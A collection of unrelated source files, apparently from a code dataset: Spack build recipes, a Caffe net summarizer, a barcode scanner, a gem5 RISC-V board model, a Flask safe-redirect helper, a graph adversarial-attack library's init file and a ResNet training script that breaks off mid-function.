if '~avx2' in self.spec:
make_defs += ['NO_AVX2=1']
if '~avx512' in self.spec:
make_defs += ['NO_AVX512=1']
return make_defs
@property
def headers(self):
# As in netlib-lapack, the only public headers for cblas and lapacke in
# openblas are cblas.h and lapacke.h. The remaining headers are private
# headers either included in one of these two headers, or included in
# one of the source files implementing functions declared in these
# headers.
return find_headers(['cblas', 'lapacke'], self.prefix.include)
@property
def build_targets(self):
targets = ['libs', 'netlib']
# Build shared if variant is set.
if '+shared' in self.spec:
targets += ['shared']
return self.make_defs + targets
@run_after('build')
@on_package_attributes(run_tests=True)
def check_build(self):
make('tests', *self.make_defs, parallel=False)
@property
def install_targets(self):
make_args = [
'install',
'PREFIX={0}'.format(self.prefix),
]
return make_args + self.make_defs
@run_after('install')
@on_package_attributes(run_tests=True)
def check_install(self):
spec = self.spec
# Openblas may pass its own test but still fail to compile Lapack
# symbols. To make sure we get working Blas and Lapack, do a small
# test.
source_file = join_path(os.path.dirname(self.module.__file__),
'test_cblas_dgemm.c')
blessed_file = join_path(os.path.dirname(self.module.__file__),
'test_cblas_dgemm.output')
include_flags = spec['openblas'].headers.cpp_flags
link_flags = spec['openblas'].libs.ld_flags
if self.compiler.name == 'intel':
link_flags += ' -lifcore'
if self.spec.satisfies('threads=pthreads'):
link_flags += ' -lpthread'
if spec.satisfies('threads=openmp'):
link_flags += ' -lpthread ' + self.compiler.openmp_flag
output = compile_c_and_execute(
source_file, [include_flags], link_flags.split()
)
compare_output_file(output, blessed_file)
|
py | 7dfa9ae250a9dedf120694a7bbca68fcb05f1d17 | # pylint: skip-file
#
# All modification made by Intel Corporation: Copyright (c) 2016 Intel Corporation
#
# All contributions by the University of California:
# Copyright (c) 2014, 2015, The Regents of the University of California (Regents)
# All rights reserved.
#
# All other contributions:
# Copyright (c) 2014, 2015, the respective contributors
# All rights reserved.
# For the list of contributors go to https://github.com/BVLC/caffe/blob/master/CONTRIBUTORS.md
#
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Intel Corporation nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
#!/usr/bin/env python
"""Net summarization tool.
This tool summarizes the structure of a net in a concise but comprehensive
tabular listing, taking a prototxt file as input.
Use this tool to check at a glance that the computation you've specified is the
computation you expect.
"""
from caffe.proto import caffe_pb2
from google import protobuf
import re
import argparse
# ANSI codes for coloring blobs (used cyclically)
COLORS = ['92', '93', '94', '95', '97', '96', '42', '43;30', '100',
'444', '103;30', '107;30']
DISCONNECTED_COLOR = '41'
def read_net(filename):
net = caffe_pb2.NetParameter()
with open(filename) as f:
protobuf.text_format.Parse(f.read(), net)
return net
def format_param(param):
out = []
if len(param.name) > 0:
out.append(param.name)
if param.lr_mult != 1:
out.append('x{}'.format(param.lr_mult))
if param.decay_mult != 1:
out.append('Dx{}'.format(param.decay_mult))
return ' '.join(out)
def printed_len(s):
return len(re.sub(r'\033\[[\d;]+m', '', s))
def print_table(table, max_width):
"""Print a simple nicely-aligned table.
table must be a list of (equal-length) lists. Columns are space-separated,
and as narrow as possible, but no wider than max_width. Text may overflow
columns; note that unlike string.format, this will not affect subsequent
columns, if possible."""
max_widths = [max_width] * len(table[0])
column_widths = [max(printed_len(row[j]) + 1 for row in table)
for j in range(len(table[0]))]
column_widths = [min(w, max_w) for w, max_w in zip(column_widths, max_widths)]
for row in table:
row_str = ''
right_col = 0
for cell, width in zip(row, column_widths):
right_col += width
row_str += cell + ' '
row_str += ' ' * max(right_col - printed_len(row_str), 0)
print row_str
def summarize_net(net):
disconnected_tops = set()
for lr in net.layer:
disconnected_tops |= set(lr.top)
disconnected_tops -= set(lr.bottom)
table = []
colors = {}
for lr in net.layer:
tops = []
for ind, top in enumerate(lr.top):
color = colors.setdefault(top, COLORS[len(colors) % len(COLORS)])
if top in disconnected_tops:
top = '\033[1;4m' + top
if len(lr.loss_weight) > 0:
top = '{} * {}'.format(lr.loss_weight[ind], top)
tops.append('\033[{}m{}\033[0m'.format(color, top))
top_str = ', '.join(tops)
bottoms = []
for bottom in lr.bottom:
color = colors.get(bottom, DISCONNECTED_COLOR)
bottoms.append('\033[{}m{}\033[0m'.format(color, bottom))
bottom_str = ', '.join(bottoms)
if lr.type == 'Python':
type_str = lr.python_param.module + '.' + lr.python_param.layer
else:
type_str = lr.type
# Summarize conv/pool parameters.
# TODO support rectangular/ND parameters
conv_param = lr.convolution_param
if (lr.type in ['Convolution', 'Deconvolution']
and len(conv_param.kernel_size) == 1):
arg_str = str(conv_param.kernel_size[0])
if len(conv_param.stride) > 0 and conv_param.stride[0] != 1:
arg_str += '/' + str(conv_param.stride[0])
if len(conv_param.pad) > 0 and conv_param.pad[0] != 0:
arg_str += '+' + str(conv_param.pad[0])
arg_str += ' ' + str(conv_param.num_output)
if conv_param.group != 1:
arg_str += '/' + str(conv_param.group)
elif lr.type == 'Pooling':
arg_str = str(lr.pooling_param.kernel_size)
if lr.pooling_param.stride != 1:
arg_str += '/' + str(lr.pooling_param.stride)
if lr.pooling_param.pad != 0:
arg_str += '+' + str(lr.pooling_param.pad)
else:
arg_str = ''
if len(lr.param) > 0:
param_strs = map(format_param, lr.param)
if max(map(len, param_strs)) > 0:
param_str = '({})'.format(', '.join(param_strs))
else:
param_str = ''
else:
param_str = ''
table.append([lr.name, type_str, param_str, bottom_str, '->', top_str,
arg_str])
return table
def main():
parser = argparse.ArgumentParser(description="Print a concise summary of net computation.")
parser.add_argument('filename', help='net prototxt file to summarize')
parser.add_argument('-w', '--max-width', help='maximum field width',
type=int, default=30)
args = parser.parse_args()
net = read_net(args.filename)
table = summarize_net(net)
print_table(table, max_width=args.max_width)
if __name__ == '__main__':
main()
|
py | 7dfa9b19e8bfbdf651281734129d722a34caa270 | from sklearn2sql_heroku.tests.regression import generic as reg_gen
reg_gen.test_model("Ridge" , "diabetes" , "oracle")
|
py | 7dfa9c9bef61d0ca98da1b1d5516b5aa676e20ac | # USAGE
# python barcode_scanner_image.py --image barcode_example.png
# import the necessary packages
from pyzbar import pyzbar
import argparse
import cv2
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image", required=True,
help="path to input image")
args = vars(ap.parse_args())
# load the input image
image = cv2.imread(args["image"])
# find the barcodes in the image and decode each of the barcodes
barcodes = pyzbar.decode(image)
# loop over the detected barcodes
for barcode in barcodes:
# extract the bounding box location of the barcode and draw the
# bounding box surrounding the barcode on the image
(x, y, w, h) = barcode.rect
cv2.rectangle(image, (x, y), (x + w, y + h), (0, 0, 255), 2)
# the barcode data is a bytes object so if we want to draw it on
# our output image we need to convert it to a string first
barcodeData = barcode.data.decode("utf-8")
barcodeType = barcode.type
# draw the barcode data and barcode type on the image
text = "{} ({})".format(barcodeData, barcodeType)
cv2.putText(image, text, (x, y - 10), cv2.FONT_HERSHEY_SIMPLEX,
0.5, (0, 0, 255), 2)
# show the output image
cv2.imshow("Image", image)
cv2.waitKey(0) |
bzl | 7dfa9d8b2367ee70b7cd9a78153860511747511f | """Loads the cpuinfo library, used by XNNPACK."""
load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive")
def repo():
http_archive(
name = "spdlog",
strip_prefix = "spdlog-1.8.2",
urls = ["https://github.com/gabime/spdlog/archive/v1.8.2.tar.gz"],
sha256 = "e20e6bd8f57e866eaf25a5417f0a38a116e537f1a77ac7b5409ca2b180cec0d5",
build_file = "@//third_party/spdlog:spdlog.BUILD",
)
|
py | 7dfa9db2d9908981a0bec1c734398722844cc954 | # Copyright (c) 2021 The Regents of the University of California
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
from typing import List
from ...utils.override import overrides
from .abstract_board import AbstractBoard
from .kernel_disk_workload import KernelDiskWorkload
from ..processors.abstract_processor import AbstractProcessor
from ..memory.abstract_memory_system import AbstractMemorySystem
from ..cachehierarchies.abstract_cache_hierarchy import AbstractCacheHierarchy
from ...resources.resource import AbstractResource
from ...isas import ISA
from ...utils.requires import requires
import m5
from m5.objects import (
BadAddr,
Bridge,
PMAChecker,
RiscvLinux,
AddrRange,
IOXBar,
RiscvRTC,
HiFive,
CowDiskImage,
RawDiskImage,
RiscvMmioVirtIO,
VirtIOBlock,
VirtIORng,
Frequency,
Port,
)
from m5.util.fdthelper import (
Fdt,
FdtNode,
FdtProperty,
FdtPropertyStrings,
FdtPropertyWords,
FdtState,
)
class RiscvBoard(AbstractBoard, KernelDiskWorkload):
"""
A board capable of full system simulation for RISC-V
At a high-level, this is based on the HiFive Unmatched board from SiFive.
This board assumes that you will be booting Linux.
**Limitations**
* Only works with classic caches
"""
def __init__(
self,
clk_freq: str,
processor: AbstractProcessor,
memory: AbstractMemorySystem,
cache_hierarchy: AbstractCacheHierarchy,
) -> None:
super().__init__(clk_freq, processor, memory, cache_hierarchy)
requires(isa_required=ISA.RISCV)
@overrides(AbstractBoard)
def _setup_board(self) -> None:
self.workload = RiscvLinux()
# Contains a CLINT, PLIC, UART, and some functions for the dtb, etc.
self.platform = HiFive()
# Note: This only works with single threaded cores.
self.platform.plic.n_contexts = self.processor.get_num_cores() * 2
self.platform.attachPlic()
self.platform.clint.num_threads = self.processor.get_num_cores()
# Add the RTC
# TODO: Why 100MHz? Does something else need to change when this does?
self.platform.rtc = RiscvRTC(frequency=Frequency("100MHz"))
self.platform.clint.int_pin = self.platform.rtc.int_pin
# Incoherent I/O bus
self.iobus = IOXBar()
self.iobus.badaddr_responder = BadAddr()
self.iobus.default = self.iobus.badaddr_responder.pio
# The virtio disk
self.disk = RiscvMmioVirtIO(
vio=VirtIOBlock(),
interrupt_id=0x8,
pio_size=4096,
pio_addr=0x10008000,
)
# The virtio rng
self.rng = RiscvMmioVirtIO(
vio=VirtIORng(),
interrupt_id=0x8,
pio_size=4096,
pio_addr=0x10007000,
)
# Note: This overrides the platform's code because the platform isn't
# general enough.
self._on_chip_devices = [self.platform.clint, self.platform.plic]
self._off_chip_devices = [self.platform.uart, self.disk, self.rng]
def _setup_io_devices(self) -> None:
"""Connect the I/O devices to the I/O bus"""
if self.get_cache_hierarchy().is_ruby():
for device in self._off_chip_devices + self._on_chip_devices:
device.pio = self.iobus.mem_side_ports
else:
for device in self._off_chip_devices:
device.pio = self.iobus.mem_side_ports
for device in self._on_chip_devices:
device.pio = self.get_cache_hierarchy().get_mem_side_port()
self.bridge = Bridge(delay="10ns")
self.bridge.mem_side_port = self.iobus.cpu_side_ports
self.bridge.cpu_side_port = (
self.get_cache_hierarchy().get_mem_side_port()
)
self.bridge.ranges = [
AddrRange(dev.pio_addr, size=dev.pio_size)
for dev in self._off_chip_devices
]
def _setup_pma(self) -> None:
"""Set the PMA devices on each core"""
uncacheable_range = [
AddrRange(dev.pio_addr, size=dev.pio_size)
for dev in self._on_chip_devices + self._off_chip_devices
]
# TODO: Not sure if this should be done per-core like in the example
for cpu in self.get_processor().get_cores():
cpu.get_mmu().pma_checker = PMAChecker(
uncacheable=uncacheable_range
)
@overrides(AbstractBoard)
def has_dma_ports(self) -> bool:
return False
@overrides(AbstractBoard)
def get_dma_ports(self) -> List[Port]:
raise NotImplementedError(
"RISCVBoard does not have DMA Ports. "
"Use `has_dma_ports()` to check this."
)
@overrides(AbstractBoard)
def has_io_bus(self) -> bool:
return True
@overrides(AbstractBoard)
def get_io_bus(self) -> IOXBar:
return self.iobus
@overrides(AbstractBoard)
def has_coherent_io(self) -> bool:
return True
@overrides(AbstractBoard)
def get_mem_side_coherent_io_port(self) -> Port:
return self.iobus.mem_side_ports
@overrides(AbstractBoard)
def _setup_memory_ranges(self):
memory = self.get_memory()
mem_size = memory.get_size()
self.mem_ranges = [AddrRange(start=0x80000000, size=mem_size)]
memory.set_memory_range(self.mem_ranges)
def generate_device_tree(self, outdir: str) -> None:
"""Creates the dtb and dts files.
Creates two files in the outdir: 'device.dtb' and 'device.dts'
:param outdir: Directory to output the files
"""
state = FdtState(addr_cells=2, size_cells=2, cpu_cells=1)
root = FdtNode("/")
root.append(state.addrCellsProperty())
root.append(state.sizeCellsProperty())
root.appendCompatible(["riscv-virtio"])
for mem_range in self.mem_ranges:
node = FdtNode("memory@%x" % int(mem_range.start))
node.append(FdtPropertyStrings("device_type", ["memory"]))
node.append(
FdtPropertyWords(
"reg",
state.addrCells(mem_range.start)
+ state.sizeCells(mem_range.size()),
)
)
root.append(node)
# See Documentation/devicetree/bindings/riscv/cpus.txt for details.
cpus_node = FdtNode("cpus")
cpus_state = FdtState(addr_cells=1, size_cells=0)
cpus_node.append(cpus_state.addrCellsProperty())
cpus_node.append(cpus_state.sizeCellsProperty())
# Used by the CLINT driver to set the timer frequency. Value taken from
# RISC-V kernel docs (Note: freedom-u540 is actually 1MHz)
cpus_node.append(FdtPropertyWords("timebase-frequency", [10000000]))
for i, core in enumerate(self.get_processor().get_cores()):
node = FdtNode(f"cpu@{i}")
node.append(FdtPropertyStrings("device_type", "cpu"))
node.append(FdtPropertyWords("reg", state.CPUAddrCells(i)))
node.append(FdtPropertyStrings("mmu-type", "riscv,sv48"))
node.append(FdtPropertyStrings("status", "okay"))
node.append(FdtPropertyStrings("riscv,isa", "rv64imafdc"))
# TODO: Should probably get this from the core.
freq = self.clk_domain.clock[0].frequency
node.append(FdtPropertyWords("clock-frequency", freq))
node.appendCompatible(["riscv"])
int_phandle = state.phandle(f"cpu@{i}.int_state")
node.appendPhandle(f"cpu@{i}")
int_node = FdtNode("interrupt-controller")
int_state = FdtState(interrupt_cells=1)
int_phandle = int_state.phandle(f"cpu@{i}.int_state")
int_node.append(int_state.interruptCellsProperty())
int_node.append(FdtProperty("interrupt-controller"))
int_node.appendCompatible("riscv,cpu-intc")
int_node.append(FdtPropertyWords("phandle", [int_phandle]))
node.append(int_node)
cpus_node.append(node)
root.append(cpus_node)
soc_node = FdtNode("soc")
soc_state = FdtState(addr_cells=2, size_cells=2)
soc_node.append(soc_state.addrCellsProperty())
soc_node.append(soc_state.sizeCellsProperty())
soc_node.append(FdtProperty("ranges"))
soc_node.appendCompatible(["simple-bus"])
# CLINT node
clint = self.platform.clint
clint_node = clint.generateBasicPioDeviceNode(
soc_state, "clint", clint.pio_addr, clint.pio_size
)
int_extended = list()
for i, core in enumerate(self.get_processor().get_cores()):
phandle = soc_state.phandle(f"cpu@{i}.int_state")
int_extended.append(phandle)
int_extended.append(0x3)
int_extended.append(phandle)
int_extended.append(0x7)
clint_node.append(
FdtPropertyWords("interrupts-extended", int_extended)
)
clint_node.appendCompatible(["riscv,clint0"])
soc_node.append(clint_node)
# PLIC node
plic = self.platform.plic
plic_node = plic.generateBasicPioDeviceNode(
soc_state, "plic", plic.pio_addr, plic.pio_size
)
int_state = FdtState(addr_cells=0, interrupt_cells=1)
plic_node.append(int_state.addrCellsProperty())
plic_node.append(int_state.interruptCellsProperty())
phandle = int_state.phandle(plic)
plic_node.append(FdtPropertyWords("phandle", [phandle]))
plic_node.append(FdtPropertyWords("riscv,ndev", [plic.n_src - 1]))
int_extended = list()
for i, core in enumerate(self.get_processor().get_cores()):
phandle = state.phandle(f"cpu@{i}.int_state")
int_extended.append(phandle)
int_extended.append(0xB)
int_extended.append(phandle)
int_extended.append(0x9)
plic_node.append(FdtPropertyWords("interrupts-extended", int_extended))
plic_node.append(FdtProperty("interrupt-controller"))
plic_node.appendCompatible(["riscv,plic0"])
soc_node.append(plic_node)
# UART node
uart = self.platform.uart
uart_node = uart.generateBasicPioDeviceNode(
soc_state, "uart", uart.pio_addr, uart.pio_size
)
uart_node.append(
FdtPropertyWords("interrupts", [self.platform.uart_int_id])
)
uart_node.append(FdtPropertyWords("clock-frequency", [0x384000]))
uart_node.append(
FdtPropertyWords("interrupt-parent", soc_state.phandle(plic))
)
uart_node.appendCompatible(["ns8250"])
soc_node.append(uart_node)
# VirtIO MMIO disk node
disk = self.disk
disk_node = disk.generateBasicPioDeviceNode(
soc_state, "virtio_mmio", disk.pio_addr, disk.pio_size
)
disk_node.append(FdtPropertyWords("interrupts", [disk.interrupt_id]))
disk_node.append(
FdtPropertyWords("interrupt-parent", soc_state.phandle(plic))
)
disk_node.appendCompatible(["virtio,mmio"])
soc_node.append(disk_node)
# VirtIO MMIO rng node
rng = self.rng
rng_node = rng.generateBasicPioDeviceNode(
soc_state, "virtio_mmio", rng.pio_addr, rng.pio_size
)
rng_node.append(FdtPropertyWords("interrupts", [rng.interrupt_id]))
rng_node.append(
FdtPropertyWords("interrupt-parent", soc_state.phandle(plic))
)
rng_node.appendCompatible(["virtio,mmio"])
soc_node.append(rng_node)
root.append(soc_node)
fdt = Fdt()
fdt.add_rootnode(root)
fdt.writeDtsFile(os.path.join(outdir, "device.dts"))
fdt.writeDtbFile(os.path.join(outdir, "device.dtb"))
@overrides(KernelDiskWorkload)
def get_disk_device(self):
return "/dev/vda"
@overrides(KernelDiskWorkload)
def _add_disk_to_board(self, disk_image: AbstractResource):
image = CowDiskImage(
child=RawDiskImage(read_only=True), read_only=False
)
image.child.image_file = disk_image.get_local_path()
self.disk.vio.image = image
# Note: The below is a bit of a hack. We need to wait to generate the
# device tree until after the disk is set up. Now that the disk and
# workload are set, we can generate the device tree file.
self._setup_io_devices()
self._setup_pma()
# Default DTB address if bbl is built with --with-dts option
self.workload.dtb_addr = 0x87E00000
self.generate_device_tree(m5.options.outdir)
self.workload.dtb_filename = os.path.join(
m5.options.outdir, "device.dtb"
)
@overrides(KernelDiskWorkload)
def get_default_kernel_args(self) -> List[str]:
return ["console=ttyS0", "root={root_value}", "ro"]
|
py | 7dfa9de8b28a73b095f4d4244b1f1f1a90d9724b | from .attacker import Attacker
from .flip_attacker import FlipAttacker
from . import targeted
from . import untargeted
from . import backdoor
from . import utils
def enabled_models(with_common=True):
"""Return the models in the gallery enabled by the current backend.
Returns
-------
tuple
A list of models enabled by the current backend.
"""
return targeted.enabled_models(with_common) + untargeted.enabled_models(with_common)
attackers = enabled_models
|
py | 7dfa9e4b044419ecf825225eff37acd77ca8c60e | """ This is a temporary module, used during (and for a while after) the
transition to Python 3. This code is planned to be kept in place until
the least version of Python supported no longer requires it (and of course
until all callers no longer need it).
This code should run as-is in 2.x and also run unedited after 2to3 in 3.x.
$Id$
"""
from __future__ import division # confidence high
import os, sys
PY3K = sys.version_info[0] > 2
def ndarr2str(arr, encoding='ascii'):
""" This is used to ensure that the return value of arr.tostring()
is actually a string. This will prevent lots of if-checks in calling
code. As of numpy v1.6.1 (in Python 3.2.3), the tostring() function
still returns type 'bytes', not 'str' as it advertises. """
# be fast, don't check - just assume 'arr' is a numpy array - the tostring
# call will fail anyway if not
retval = arr.tostring()
# would rather check "if isinstance(retval, bytes)", but support 2.5.
# could rm the if PY3K check, but it makes this faster on 2.x.
if PY3K and not isinstance(retval, str):
return retval.decode(encoding)
else: # is str
return retval
def ndarr2bytes(arr, encoding='ascii'):
""" This is used to ensure that the return value of arr.tostring()
is actually a *bytes* array in PY3K. See notes in ndarr2str above. Even
though we consider it a bug that numpy's tostring() function returns
a bytes array in PY3K, there are actually many instances where that is what
we want - bytes, not unicode. So we use this function in those
instances to ensure that when/if this numpy "bug" is "fixed", that
our calling code still gets bytes where it needs/expects them. """
# be fast, don't check - just assume 'arr' is a numpy array - the tostring
# call will fail anyway if not
retval = arr.tostring()
# would rather check "if not isinstance(retval, bytes)", but support 2.5.
if PY3K and isinstance(retval, str):
# Take note if this ever gets used. If this ever occurs, it
# is likely wildly inefficient since numpy.tostring() is now
# returning unicode and numpy surely has a tobytes() func by now.
# If so, add a code path to call its tobytes() func at our start.
return retval.encode(encoding)
else: # is str==bytes in 2.x
return retval
def tobytes(s, encoding='ascii'):
""" Convert string s to the 'bytes' type, in all Pythons, even
back before Python 2.6. What 'str' means varies by PY3K or not.
In Pythons before 3.0, this is technically the same as the str type
in terms of the character data in memory. """
# NOTE: after we abandon 2.5, we might simply instead use "bytes(s)"
# NOTE: after we abandon all 2.*, del this and prepend byte strings with 'b'
if PY3K:
if isinstance(s, bytes):
return s
else:
return s.encode(encoding)
else:
# for py2.6 on (before 3.0), bytes is same as str; 2.5 has no bytes
# but handle if unicode is passed
if isinstance(s, unicode):
return s.encode(encoding)
else:
return s
def tostr(s, encoding='ascii'):
""" Convert string-like-thing s to the 'str' type, in all Pythons, even
back before Python 2.6. What 'str' means varies by PY3K or not.
In Pythons before 3.0, str and bytes are the same type.
In Python 3+, this may require a decoding step. """
if PY3K:
if isinstance(s, str): # str == unicode in PY3K
return s
else: # s is type bytes
return s.decode(encoding)
else:
# for py2.6 on (before 3.0), bytes is same as str; 2.5 has no bytes
# but handle if unicode is passed
if isinstance(s, unicode):
return s.encode(encoding)
else:
return s
try:
BNULLSTR = tobytes('') # after dropping 2.5, change to: b''
BNEWLINE = tobytes('\n') # after dropping 2.5, change to: b'\n'
except:
BNULLSTR = ''
BNEWLINE = '\n'
def bytes_read(fd, sz):
""" Perform an os.read in a way that can handle both Python2 and Python3
IO. Assume we are always piping only ASCII characters (since that is all
we have ever done with IRAF). Either way, return the data as bytes.
"""
# return tobytes(os.read(fd, sz))
return os.read(fd, sz) # already returns str in Py2.x and bytes in PY3K
def bytes_write(fd, bufstr):
""" Perform an os.write in a way that can handle both Python2 and Python3
IO. Assume we are always piping only ASCII characters (since that is all
we have ever done with IRAF). Either way, write the binary data to fd.
"""
return os.write(fd, tobytes(bufstr))
|
py | 7dfa9edda555cb3aedfa6633bdf1279562a02448 | # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Filebench(AutotoolsPackage):
"""
Filebench is a file system and storage benchmark that can generate a
large variety of workloads. Unlike typical benchmarks it is extremely
flexible and allows to specify application's I/O behavior using its
extensive Workload Model Language (WML). Users can either describe
desired workloads from scratch or use(with or without modifications)
workload personalities shipped with Filebench(e.g., mail-, web-, file-,
and database-server workloads). Filebench is equally good for micro
and macro-benchmarking, quick to setup, and relatively easy to use.
"""
homepage = "https://github.com/filebench/filebench"
url = "https://github.com/filebench/filebench/archive/1.4.9.1.tar.gz"
version('1.4.9.1', sha256='77ae91b83c828ded1219550aec74fbbd6975dce02cb5ab13c3b99ac2154e5c2e')
version('1.4.9', sha256='61b8a838c1450b51a4ce61481a19a1bf0d6e3993180c524ff4051f7c18bd9c6a')
depends_on('autoconf', type='build')
depends_on('automake', type='build')
depends_on('libtool', type='build')
depends_on('m4', type='build')
depends_on('flex', type='build')
depends_on('bison', type='build')
|
py | 7dfa9f018608d6a11e3e4afd22be50c20ae14e7d | # -*- coding: utf-8 -*-
"""
:author: Grey Li (李辉)
:url: http://greyli.com
:copyright: © 2018 Grey Li <[email protected]>
:license: MIT, see LICENSE for more details.
"""
try:
from urlparse import urlparse, urljoin
except ImportError:
from urllib.parse import urlparse, urljoin
from flask import request, redirect, url_for
def is_safe_url(target):
ref_url = urlparse(request.host_url)
test_url = urlparse(urljoin(request.host_url, target))
return test_url.scheme in ('http', 'https') and ref_url.netloc == test_url.netloc
def redirect_back(default='blog.index', **kwargs):
for target in request.args.get('next'), request.referrer:
if not target:
continue
if is_safe_url(target):
return redirect(target)
return redirect(url_for(default, **kwargs))
|
py | 7dfa9f175fc34d11c6c07622e1bf31ebdca4963c | # Coder: Wenxin Xu
# Github: https://github.com/wenxinxu/resnet_in_tensorflow
# ==============================================================================
from resnet import *
from datetime import datetime
import time
from cifar10_input import *
import pandas as pd
from hardware_estimation import hardware_estimation
import pickle
import tensorflow.contrib.slim as slim
from pathlib import Path
class_num = 10
image_size = 32
img_channels = 3
class Train(object):
'''
This Object is responsible for all the training and validation process
'''
def __init__(self):
# Set up all the placeholders
self.placeholders()
def placeholders(self):
'''
There are five placeholders in total.
image_placeholder and label_placeholder are for train images and labels
vali_image_placeholder and vali_label_placeholder are for validation imgaes and labels
lr_placeholder is for learning rate. Feed in learning rate each time of training
implements learning rate decay easily
'''
self.image_placeholder = tf.placeholder(dtype=tf.float32,
shape=[FLAGS.train_batch_size, IMG_HEIGHT,
IMG_WIDTH, IMG_DEPTH])
self.label_placeholder = tf.placeholder(dtype=tf.int32, shape=[FLAGS.train_batch_size])
self.vali_image_placeholder = tf.placeholder(dtype=tf.float32, shape=[FLAGS.validation_batch_size,
IMG_HEIGHT, IMG_WIDTH, IMG_DEPTH])
self.vali_label_placeholder = tf.placeholder(dtype=tf.int32, shape=[FLAGS.validation_batch_size])
self.lr_placeholder = tf.placeholder(dtype=tf.float32, shape=[])
def build_train_validation_graph(self):
'''
This function builds the train graph and validation graph at the same time.
'''
_input_array= []
_weights = []
global_step = tf.Variable(0, trainable=False)
validation_step = tf.Variable(0, trainable=False)
# Logits of training data and valiation data come from the same graph. The inference of
# validation data share all the weights with train data. This is implemented by passing
# reuse=True to the variable scopes of train graph
logits,_input_array,_weights = inference(self.image_placeholder, FLAGS.num_residual_blocks, reuse=False)
vali_logits,_input_array,_weights = inference(self.vali_image_placeholder, FLAGS.num_residual_blocks, reuse=True)
# The following codes calculate the train loss, which is consist of the
# softmax cross entropy and the relularization loss
regu_losses = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)
loss = self.loss(logits, self.label_placeholder)
self.full_loss = tf.add_n([loss] + regu_losses)
predictions = tf.nn.softmax(logits)
self.train_top1_error = self.top_k_error(predictions, self.label_placeholder, 1)
# Validation loss
self.vali_loss = self.loss(vali_logits, self.vali_label_placeholder)
vali_predictions = tf.nn.softmax(vali_logits)
self.vali_top1_error = self.top_k_error(vali_predictions, self.vali_label_placeholder, 1)
self.train_op, self.train_ema_op = self.train_operation(global_step, self.full_loss,
self.train_top1_error)
self.val_op = self.validation_op(validation_step, self.vali_top1_error, self.vali_loss)
def train(self):
'''
This is the main function for training
'''
# For the first step, we are loading all training images and validation images into the
# memory
all_data, all_labels = prepare_train_data(padding_size=FLAGS.padding_size)
vali_data, vali_labels = read_validation_data()
# Build the graph for train and validation
self.build_train_validation_graph()
# Initialize a saver to save checkpoints. Merge all summaries, so we can run all
# summarizing operations by running summary_op. Initialize a new session
saver = tf.train.Saver(tf.global_variables())
summary_op = tf.summary.merge_all()
init = tf.initialize_all_variables()
sess = tf.Session()
# If you want to load from a checkpoint
if FLAGS.is_use_ckpt is True:
saver.restore(sess, FLAGS.ckpt_path)
print ('Restored from checkpoint...')
else:
sess.run(init)
# This summary writer object helps write summaries on tensorboard
summary_writer = tf.summary.FileWriter(train_dir, sess.graph)
# These lists are used to save a csv file at last
step_list = []
train_error_list = []
val_error_list = []
print ('Start training...')
print ('----------------------------')
for step in range(FLAGS.train_steps):
train_batch_data, train_batch_labels = self.generate_augment_train_batch(all_data, all_labels,
FLAGS.train_batch_size)
validation_batch_data, validation_batch_labels = self.generate_vali_batch(vali_data,
vali_labels, FLAGS.validation_batch_size)
# Want to validate once before training. You may check the theoretical validation
# loss first
if step % FLAGS.report_freq == 0:
if FLAGS.is_full_validation is True:
validation_loss_value, validation_error_value = self.full_validation(loss=self.vali_loss,
top1_error=self.vali_top1_error, vali_data=vali_data,
